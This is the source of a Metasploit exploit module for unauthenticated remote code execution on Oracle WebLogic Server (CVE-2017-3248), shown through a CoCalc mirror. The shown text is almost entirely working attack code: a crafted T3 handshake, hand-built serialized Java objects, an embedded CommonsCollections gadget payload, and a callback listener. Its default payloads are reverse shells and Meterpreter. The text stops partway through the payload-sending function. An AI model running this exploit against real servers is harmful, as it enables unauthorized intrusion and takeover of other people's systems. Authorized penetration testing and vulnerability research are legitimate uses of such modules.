CoCalc -- weblogic_deserialize

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb
Views: ¹¹⁷⁸⁴
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::Tcp
11
  include Msf::Exploit::Remote::TcpServer
12
  #include Msf::Exploit::Remote::HttpClient
13
  include Msf::Exploit::Powershell
14

15
  def initialize(info={})
16
    super(update_info(info,
17
      'Name' => 'Oracle Weblogic Server Deserialization RCE - RMI UnicastRef',
18
      'Description' => %q{
19
        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
20
        interface can send a serialized object (sun.rmi.server.UnicastRef)
21
        to the interface to execute code on vulnerable hosts.
22
      },
23
      'Author' =>
24
        [
25
        'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
26
        'Jacob Baines',      # Vulnerability Discovery - Tenable Network Security
27
        'Aaron Soto'         # Reverse Engineering JSO and ysoserial blobs
28
        ],
29
      'License' => MSF_LICENSE,
30
      'References' =>
31
        [
32
          ['CVE', '2017-3248']
33
        ],
34
      'Privileged' => false,
35
      'Platform' => %w{ unix win solaris },
36
      'Targets' =>
37
        [
38
          [ 'Unix',
39
            'Platform' => 'unix',
40
            'Arch' => ARCH_CMD,
41
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
42
            'Payload' => {
43
              'Encoder' => 'cmd/ifs',
44
              'BadChars' => ' ',
45
              'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
46
            }
47
          ],
48
          [ 'Windows',
49
            'Platform' => 'win',
50
            'Payload' => {},
51
            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
52
          ],
53
          [ 'Solaris',
54
            'Platform' => 'solaris',
55
            'Arch' => ARCH_CMD,
56
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
57
            'Payload' => {
58
              'Space'       => 2048,
59
              'DisableNops' => true,
60
              'Compat'      =>
61
                {
62
                  'PayloadType' => 'cmd',
63
                  'RequiredCmd' => 'generic perl telnet',
64
                }
65
            }
66
          ]
67
        ],
68
      'DefaultTarget' => 0,
69
      'DefaultOptions' =>
70
        {
71
          'WfsDelay' => 12
72
        },
73
      'DisclosureDate' => '2017-01-25'))
74

75
    register_options([Opt::RPORT(7001)])
76
  end
77

78
=begin   This check is currently incompatible with the Tcp mixin.  :-(
79
  def check
80
    resp = send_request_cgi(
81
      'method' => 'GET',
82
      'uri'    => '/console/login/LoginForm.jsp'
83
    )
84

85
    return CheckCode::Unknown unless resp && resp.code == 200
86

87
    unless resp.body.include?('Oracle WebLogic Server Administration Console')
88
      vprint_warning("Oracle WebLogic Server banner cannot be found")
89
      return CheckCode::Unknown
90
    end
91

92
    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
93
    unless version
94
      vprint_warning("Oracle WebLogic Server version cannot be found")
95
      return CheckCode::Unknown
96
    end
97

98
    version = Rex::Version.new(version)
99
    vprint_good("Detected Oracle WebLogic Server Version: #{version}")
100
    case
101
    when version.to_s.start_with?('10.3')
102
      return CheckCode::Appears unless version > Rex::Version.new('10.3.6.0')
103
    when version.to_s.start_with?('12.1.3')
104
      return CheckCode::Appears unless version > Rex::Version.new('12.1.3.0')
105
    when version.to_s.start_with?('12.2')
106
      return CheckCode::Appears unless version > Rex::Version.new('12.2.1.1')
107
    end
108

109
    return CheckCode::Safe
110
  end
111
=end
112

113
  def gen_resp
114
    if target.name == 'Windows'
115
      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
116
      mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
117
    elsif target.name == 'Unix' || target.name == 'Solaris'
118
      nix_cmd = payload.encoded
119
      mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
120
    end
121

122
    serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
123
    serialized_cmd << mycmd
124

125
    # Response data taken from JRMPListener generated data:
126
    # java -cp ysoserial-0.0.5-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 calc.exe
127
    # Modified captured network traffic bytes. Patch in command to run
128
    # TODO: Migrate this functionality to the new JavaDeserialization utilities
129
    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
130
    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
131
    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
132
    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
133
    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
134
    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
135
    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
136
    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
137
    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
138
    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
139
    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
140
    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
141
    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
142
    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
143
    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
144
    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
145
    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
146
    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
147
    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
148
    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
149
    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
150
    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
151
    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
152
    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
153
    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
154
    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
155
    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
156
    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
157
    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
158
    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
159
    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
160
    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
161
    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
162
    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
163
    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
164
    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
165
    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
166
    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
167
    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
168
    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
169
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
170
    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
171
    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
172
    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
173
    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
174
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
175
    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
176
    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
177
    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
178
    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
179
    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
180
    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
181
    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
182
    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
183
    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
184
    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
185
    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
186
    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
187
    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
188
    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
189
    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
190
    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
191
    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
192
    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
193
    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
194
    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
195
    @resp << '673badd256e7e91d7b470200007078700000000174'
196

197
    @resp << serialized_cmd
198

199
    @resp << '74'
200
    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
201
    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
202
    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
203
    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
204
    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
205
    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
206
    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
207
    @resp << '7e005a'
208
  end
209

210
  def on_client_connect(client)
211
    # Make sure to only sent one meterpreter payload to a host.
212
    # (or as long as the server was listening).
213
    vprint_status("Comparing host: #{client.peerhost}")
214
    if @met_sent.include?(client.peerhost) then return end
215
    @met_sent << client.peerhost
216

217
    print_status("Sending payload to client: #{client.peerhost}")
218

219
    # Response format determined by watching network traffic
220
    accept_conn = '4e00'
221
    raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
222
    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
223
    accept_conn << raccept_conn
224
    accept_conn << '0000'
225
    accept_conn << client.peerport.to_s(16).rjust(4,'0')
226

227
    client.put([accept_conn].pack('H*'))
228
    client.get_once
229
    client.get_once
230
    client.put([@resp].pack('H*'))
231
    client.get_once
232

233
    service.close_client(client)
234
  end
235

236
  def t3_handshake
237
    # retrieved from network traffic
238
    shake = "t3 12.2.1\n"
239
    shake << "AS:255\n"
240
    shake << "HL:19\n"
241
    shake << "MS:10000000\n\n"
242

243
    sock.put(shake)
244
    sleep(1)
245
    sock.get_once
246
  end
247

248
  def build_t3_request_object
249
    # T3 request serialized data
250
    # retrieved by watching network traffic
251
    # This is a proprietary, undocumented protocol
252
    data =  '000005c3'                                     # lenght of the packet
253
    data << '01'                                           # CMD_IDENTIFY_REQUEST
254
    data << '65'                                           # QOS
255
    data << '01'                                           # Flags:
256
                                                           #   CONTEXT_JVMID_FLAG = 1 (has JVMIDs)
257
                                                           #   CONTEXT_TX_FLAG = 2
258
                                                           #   CONTEXT_TRACE_FLAG = 4
259
                                                           #   CONTEXT_EXTENDED_FLAG = 8
260
                                                           #   CONTEXT_EXTENDED_USER_FLAG = 16
261
    data << 'ffffffff'                                     # response id
262
    data << 'ffffffff'                                     # invocable id
263
    data << '0000006a'                                     # abbrev offset
264
    data << '0000ea60'                                     # reconnect timeout ??
265

266
    # TODO: WHAT DOES THIS DO?  CAN WE RANDOMIZE ANY OF IT?
267
    data << '0000001900937b484a56fa4a777666f581daa4f5b9'
268
    data << '0e2aebfc607499b402797372007872017872027870'
269
    data << '0000000a0000000300000000000000060070707070'
270
    data << '70700000000a000000030000000000000006007006'
271

272
    data << 'fe010000'                                     # ----- separator -----
273

274
    data << 'aced0005'                                     # JSO v5 header
275
    data << '73'                                           # object header
276
    data << '72001d'                                       # className (29 bytes):
277
    data << '7765626c6f6769632e726a766d2e436c617373'       #   weblogic.rjvm.ClassTableEntry
278
    data << '5461626c65456e747279'                         #   (continued)
279
    data << '2f52658157f4f9ed'                             #   serialVersionUID
280
    data << '0c00007870'                                   #   remainder of object header
281
    data << '72'                                           # object header
282
    data << '00247765626c6f6769632e636f6d6d6f6e2e696e74'   #   className (36 bytes): weblogic.common.internal.PackageInfo
283
    data << '65726e616c2e5061636b616765496e666f'           #   (continued)
284
    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID
285
    data << '02'                                           #   SC_SERIALIZABLE
286
    data << '0008'                                         #   fieldCount = 8
287
    data << '4900056d616a6f72'                             #     0: Int: major
288
    data << '4900056d696e6f72'                             #     1: Int: minor
289
    data << '49000c726f6c6c696e675061746368'               #     2: Int rollingPatch
290
    data << '49000b736572766963655061636b'                 #     3: Int: servicePack
291
    data << '5a000e74656d706f726172795061746368'           #     4: Bool: temporaryPatch
292
    data << '4c0009696d706c5469746c65'                     #     5: Obj: implTitle
293
    data << '7400124c6a6176612f6c616e672f537472696e673b'   #        java/lang/String
294
    data << '4c000a696d706c56656e646f72'                   #     6: Obj: implVendor
295
    data << '71007e0003'                                   #        (Handle) 0x007e0003
296
    data << '4c000b696d706c56657273696f6e'                 #     7: Obj: implVersion
297
    data << '71007e0003'                                   #        (Handle) 0x007e0003
298
    data << '78707702000078'                               #   block footers
299

300
    data << 'fe010000'                                     # ----- separator -----
301

302
    data << 'aced0005'                                     # JSO v5 header
303
    data << '7372'                                         # object header
304
    data << '001d7765626c6f6769632e726a766d2e436c6173'     # className (29 bytes): weblogic.rjvm.ClassTableEntry
305
    data << '735461626c65456e747279'                       #    (continued)
306
    data << '2f52658157f4f9ed'                             # serialVersionUID
307
    data << '0c'                                           # EXTERNALIZABLE | BLOCKDATA
308
    data << '00007870'                                     # remainder of object header
309
    data << '72'                                           # object header
310
    data << '00247765626c6f6769632e636f6d6d6f6e2e696'      # className (36 bytes): weblogic.common.internal.VersionInfo
311
    data << 'e7465726e616c2e56657273696f6e496e666f'        #    (continued)
312
    data << '972245516452463e'                             # serialVersionUID
313
    data << '02'                                           # SC_SERIALIZABLE
314
    data << '0003'                                         #   fieldCount = 3
315
    data << '5b0008'                                       #   array header (8 bytes)
316
    data << '7061636b61676573'                             #     ARRAY NAME = 'packages'
317
    data << '740027'                                       #     TC_STRING className1 (39 bytes)
318
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'       #       weblogic/common/internal/PackageInfo
319
    data << '6e7465726e616c2f5061636b616765496e666f'       #       (continued)
320
    data << '3b'                                           #       (continued)
321
    data << '4c000e'                                       #   object header (14 bytes)
322
    data << '72656c6561736556657273696f6e'                 #     releaseVersion
323
    data << '740012'                                       #     TC_STRING (18 bytes)
324
    data << '4c6a6176612f6c616e672f537472696e673b'         #       versionInfoAsBytes
325
    data << '5b0012'                                       #   array header (18 bytes)
326
    data << '76657273696f6e496e666f41734279746573'         #     ARRAY NAME = java/lang/String;
327
    data << '740002'                                       #     TC_STRING (2 bytes)
328
    data << '5b42'                                         #       0x5b42 = [B
329
    data << '78'                                           # block footer
330

331
    data << '720024'                                       # class (36 bytes)
332
    data << '7765626c6f6769632e636f6d6d6f6e2e696e'         #   weblogic.common.internal.PackageInfo
333
    data << '7465726e616c2e5061636b616765496e666f'         #   (continued)
334
    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID
335

336
    data << '02'                                           #   SC_SERIALIZABLE
337
    data << '0008'                                         #   fieldCount = 8
338
    data << '4900056d616a6f72'                             #   0: Int: major
339
    data << '4900056d696e6f72'                             #   1: Int: minor
340
    data << '49000c726f6c6c696e675061746368'               #   2: Int rollingPatch
341
    data << '49000b736572766963655061636b'                 #   3: Int: servicePack
342
    data << '5a000e74656d706f726172795061746368'           #   4: Bool: temporaryPatch
343
    data << '4c0009696d706c5469746c65'                     #   5: Obj: implTitle
344
    data << '71'                                           #      TC_REFERENCE
345
    data << '007e0004'                                     #      Handle = 0x007e0004
346
    data << '4c000a696d706c56656e646f72'                   #   6: Obj: implVendor
347
    data << '71'                                           #      TC_REFERENCE
348
    data << '007e0004'                                     #      Handle = 0x007e0004
349
    data << '4c000b696d706c56657273696f6e'                 #   7: Obj: implVersion
350
    data << '71'                                           #      TC_REFERENCE
351
    data << '007e0004'                                     #      Handle = 0x007e0004
352
    data << '78'                                           # class footer
353
    data << '70'                                           # TC_NULL
354
    data << '77020000'                                     # BLOCKDATA (2 bytes): 0x0000
355
    data << '78'                                           # block footer
356

357
    data << 'fe010000'                                     # ----- separator -----
358

359
    data << 'aced0005'                                     # JSO v5 header
360
    data << '73'                                           # object header
361
    data << '72001d'                                       # className (29 bytes):
362
    data << '7765626c6f6769632e726a766d2e436c617373'       #   weblogic.rjvm.ClassTableEntry
363
    data << '5461626c65456e747279'                         #   (continued)
364
    data << '2f52658157f4f9ed'                             #   serialVersionUID
365
    data << '0c00007870'                                   #   remainder of object header
366
    data << '720021'                                       # className (33 bytes)
367
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'       #   weblogic.common.internal.PeerInfo
368
    data << '65726e616c2e50656572496e666f'                 #   (continued)
369
    data << '585474f39bc908f1'                             #   serialVersionUID
370
    data << '02'                                           #   SC_SERIALIZABLE
371
    data << '0006'                                         #   fieldCount = 6
372
    data << '4900056d616a6f72'                             #     0: Int: major
373
    data << '4900056d696e6f72'                             #     1: Int: minor
374
    data << '49000c726f6c6c696e675061746368'               #     2: Int rollingPatch
375
    data << '49000b736572766963655061636b'                 #     3: Int: servicePack
376
    data << '5a000e74656d706f726172795061746368'           #     4: Bool: temporaryPatch
377
    data << '5b00087061636b61676573'                       #     5: Array: packages
378
    data << '740027'                                       #        TC_STRING (39 bytes)
379
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'       #        Lweblogic/common/internal/PackageInfo;
380
    data << '6e7465726e616c2f5061636b616765496e666f'       #        (continued)
381
    data << '3b'                                           #        (continued)
382
    data << '78'                                           # block footer
383
    data << '720024'                                       # class (36 bytes)
384
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'       #   Lweblogic/common/internal/PackageInfo;
385
    data << '65726e616c2e56657273696f6e496e666f'           #   (continued)
386
    data << '972245516452463e'                             #   serialVersionUID
387
    data << '02'                                           #   SC_SERIALIZABLE
388
    data << '0003'                                         #   fieldCount = 3
389
    data << '5b0008'                                       #   0: Array
390
    data << '7061636b6167657371'                           #      packages
391
    data << '007e0003'                                     #      Handle = 0x00730003
392
    data << '4c000e72656c6561736556657273696f6e'           #   1: Obj: releaseVersion
393
    data << '7400124c6a6176612f6c616e672f537472696e673b'   #      Ljava/lang/String;
394
    data << '5b001276657273696f6e496e666f41734279746573'   #   2: Array: versionInfoAsBytes
395
    data << '740002'                                       #      TC_STRING (2 bytes)
396
    data << '5b42'                                         #      VALUE = 0x5b42 = [B
397
    data << '78'                                           # block footer
398
    data << '720024'                                       # class: (36 bytes)
399
    data << '7765626c6f6769632e636f6d6d6f6e2e696e746572'   #   Name = weblogic.common.internal.PackageInfo
400
    data << '6e616c2e5061636b616765496e666f'               #   (continued)
401
    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID
402
    data << '02'                                           #   SC_SERIALIZABLE
403
    data << '0008'                                         #   fieldCount = 8
404
    data << '4900056d616a6f72'                             #   0: Int: major
405
    data << '4900056d696e6f72'                             #   1: Int: minor
406
    data << '49000c726f6c6c696e675061746368'               #   2: Int rollingPatch
407
    data << '49000b736572766963655061636b'                 #   3: Int: servicePack
408
    data << '5a000e74656d706f726172795061746368'           #   4: Bool: temporaryPatch
409
    data << '4c0009696d706c5469746c65'                     #   5: Obj: implTitle
410
    data << '71'                                           #      TC_REFERENCE
411
    data << '007e0005'                                     #      Handle = 0x007e0005
412
    data << '4c000a696d706c56656e646f72'                   #   6: Obj: implVendor
413
    data << '71'                                           #      TC_REFERENCE
414
    data << '007e0005'                                     #      Handle = 0x007e0005
415
    data << '4c000b696d706c56657273696f6e'                 #   7: Obj: implVersion
416
    data << '71'                                           #      TC_REFERENCE
417
    data << '007e0005'                                     #      Handle = 0x007e0005
418
    data << '78'                                           # class footer
419
    data << '707702000078'                                 # block footers
420

421
    data << 'fe00ff'                                       # whatever this cruft is again
422

423
    data << 'fe010000'                                     # ----- separator -----
424

425
    # weblogic.rjvm.JVMID object
426
    data << 'aced0005'                                     # JSO v5 header
427
    data << '73'                                           # object header
428
    data << '720013'                                       #   class (19 bytes)
429
    data << '7765626c6f6769632e726a766d2e4a564d4944'       #   name = 'weblogic.rjvm.JVMID'
430
    data << 'dc49c23ede121e2a'                             #   serialVersionUID
431
    data << '0c'                                           #   EXTERNALIZABLE | BLOCKDATA
432
    data << '0000'                                         #   fieldCount = 0   (!!!)
433
    data << '78'                                           # block footer
434
    data << '70'                                           # NULL
435
    data << '7750'                                         # block header (80 bytes)
436
    data << '21'                                           #   !
437
    data << '000000000000000000'                           #   9 NULL BYTES
438
    data << '0d'                                           #   \n
439
    #data << '3139322e3136382e312e323237'                  #   original PoC string = 192.168.1.227
440
    data << '3030302e3030302e3030302e30'                   #   new string = 000.000.000.0
441
                                                           #      (must be an IP, and length isn't trivially editable)
442
    data << '00'                                           #   \0
443
    data << '12'                                           #   strLength = 18 bytes
444
    #data << '57494e2d4147444d565155423154362e6568'        #   original str = WIN-AGDMVQUB1T6.eh
445
    data << rand_text_alphanumeric(18).unpack('H*')[0]
446
    data << '83348cd6'                                     #   ??? UNKNOWN ???  (Note: Cannot be randomized)
447
    data << '000000070000'                                 #   ??? UNKNOWN ???
448
    data << rport.to_s(16).rjust(4, '0')                   #   callback port
449
    data << 'ffffffffffffffffffffffffffffffffffffff'       #   ??? UNKNOWN ???
450
    data << 'ffffffffff'                                   #   ??? UNKNOWN ???
451
    data << '78'                                           # block footer
452

453
    data << 'fe010000'                                     # ----- separator -----
454

455
    # weblogic.rjvm.JVMID object
456
    data << 'aced0005'                                     # JSO v5 header
457
    data << '73'                                           # object header
458
    data << '72'                                           #   class
459
    data << '00137765626c6f6769632e726a766d2e4a564d4944'   #   Name: weblogic.rjvm.JVMID
460
    data << 'dc49c23ede121e2a'                             #   serialVersionUID
461
    data << '0c'                                           #   EXTERNALIZABLE | BLOCKDATA
462
    data << '0000'                                         #   fieldCount = 0
463
    data << '78'                                           # end block
464
    data << '70'                                           # TC_NULL
465
    data << '77'                                           # block header
466
    data << '20'                                           #   length = 32 bytes
467
    data << '0114dc42bd071a772700'                         #     ??? UNKNOWN ???
468
    #data << rand_text_alphanumeric(10).unpack('H*')[0]    #     (NOTE: RANDOMIZAITON BREAKS THINGS)
469
    data << '0d'                                           #     \n
470
    #data << '3234322e3231342e312e323534'                  #     original string = 242.214.1.254
471
    data << '3030302e3030302e3030302e30'                   #     new string = 000.000.000.0
472
                                                           #      (must be an IP, and length isn't trivially editable)
473
    #data << '61863d1d'                                    #     original string = ??? UNKNOWN ???
474
    data << rand_text_alphanumeric(4).unpack('H*')[0]      #     new = randomized
475
    data << '00000000'                                     #     NULL BYTES
476
    data << '78'                                           # block footer
477

478
    sock.put([data].pack('H*'))
479
    sleep(1)
480
    sock.get_once
481
  end
482

483
  def send_payload_objdata
484
    shost = srvhost
485
    if ['0.0.0.0', '127.0.0.1', '::'].include?(shost)
486
      shost = Rex::Socket.source_address
487
    end
488

489
    # JRMPClient payload generated from ysoserial:
490
    # Patch in srvhost and srvport
491
    # TODO: Migrate this functionality to the new JavaDeserialization utilities
492
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
493
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
494
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'
495

496
    payload << 'fe010000'                                  # ----- separator -----
497

498
    payload << 'aced0005'                                  # JSO v5 header
499
    payload << '73'                                        # object header
500
    payload << '72'                                        #   class
501
    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry
502
    payload << '73735461626c65456e747279'                  #     (cont)
503
    payload << '2f52658157f4f9ed'                          #   serialVersionUID
504
    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA
505
    payload << '0000'                                      #   fieldCount = 0
506
    payload << '7870'                                      #   remaining object header
507
    payload << '72'                                        # class header
508
    payload << '00025b42'                                  #   Name: 0x5b42
509
    payload << 'acf317f8060854e0'                          #   serialVersionUID
510
    payload << '02'                                        #   SERIALIZABLE
511
    payload << '0000'                                      #   fieldCount = 0
512
    payload << '7870'                                      #   class footer
513
    payload << '77'                                        # block header
514
    payload << '020000'                                    #   contents = 0x0000
515
    payload << '78'                                        #   block footer
516

517
    payload << 'fe010000'                                  # ----- separator -----
518

519
    payload << 'aced0005'                                  # JSO v5 header
520
    payload << '73'                                        # object header
521
    payload << '72'                                        #   class
522
    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry
523
    payload << '73735461626c65456e747279'                  #     (cont)
524
    payload << '2f52658157f4f9ed'                          #   serialVersionUID
525
    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA
526
    payload << '0000'                                      #   fieldCount = 0
527
    payload << '7870'                                      #   remaining object header
528
    payload << '72'                                        # class header
529

530
    payload << '00135b4c6a6176612e6c616e672e4f626a'        #   Name: [Ljava.lang.Object;
531
    payload << '6563743b'                                  #     (cont)
532
    payload << '90ce589f1073296c'                          #   serialVersionUID
533
    payload << '02'                                        #   SERIALIZABLE
534
    payload << '0000'                                      #   fieldCount = 0
535
    payload << '7870'                                      #   remaining object header
536
    payload << '77'                                        # block header
537
    payload << '020000'                                    #   contents = 0x0000
538
    payload << '78'                                        #   block footer
539

540
    payload << 'fe010000'                                  # ----- separator -----
541

542
    payload << 'aced0005'                                  # JSO v5 header
543
    payload << '73'                                        # object header
544
    payload << '72'                                        #   class
545

546
    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry
547
    payload << '73735461626c65456e747279'                  #     (cont)
548
    payload << '2f52658157f4f9ed'                          #   serialVersionUID
549
    payload << '0c'                                        #   SERIALIZABLE | BLOCKDATA
550
    payload << '0000'                                      #   fieldCount = 0
551
    payload << '7870'                                      #   block footer
552
    payload << '72'                                        # class header
553
    payload << '00106a6176612e7574696c2e566563746f72'      #   Name: java.util.Vector
554
    payload << 'd9977d5b803baf01'                          #   serialVersionUID
555
    payload << '03'                                        #   WRITE_METHOD | SERIALIZABLE
556
    payload << '0003'                                      #   fieldCount = 3
557
    payload << '4900116361706163697479496e6372656d656e74'  #   0: Int: capacityIncrement
558
    payload << '49000c656c656d656e74436f756e74'            #   1: Int: elementCount
559
    payload << '5b000b656c656d656e7444617461'              #   2: Array: elementData
560
    payload << '7400135b4c6a6176612f6c616e672f4f626a6563'  #   3: String: [Ljava/lang/Object;
561
    payload << '743b'                                      #      (cont)
562
    payload << '7870'                                      #   remaining object header
563
    payload << '77'                                        # block header
564
    payload << '020000'                                    #   contents = 0x0000
565
    payload << '78'                                        #   block footer
566

567
    payload << 'fe010000'                                  # ----- separator -----
568

569
    # manually generated payload using an UnicastRef object
570
    # needed parameters are patched in runtime
571
    payload << 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265'
572
    payload << '676973747279787200176a6176612e6c616e672e7265666c6563742e50726f78'
573
    payload << '79e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265'
574
    payload << '666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a61'
575
    payload << '76612e726d692e7365727665722e52656d6f74654f626a656374496e766f6361'
576
    payload << '74696f6e48616e646c657200000000000000020200007872001c6a6176612e72'
577
    payload << '6d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300'
578
    payload << '00787077'
579
    # serialize the srvhost manually
580
    unicast_srvhost = shost.each_byte.map { |b| b.to_s(16) }.join
581
    unicast_dat = '000a556e696361737452656600'
582
    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
583
    unicast_dat << unicast_srvhost
584
    unicast_dat << '0000'
585
    unicast_dat << srvport.to_s(16).rjust(4,'0')
586
    # unique identifier (for multiple executions)
587
    rand_id = rand(1..65535)
588
    unicast_dat << '000000006133'
589
    unicast_dat << rand_id.to_s(16).rjust(4,'0')
590
    unicast_dat << '00000000000000000000000000000078'
591
    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
592
    payload << unicast_dat
593

594
    payload << 'fe010000'                                  # ----- separator -----
595

596
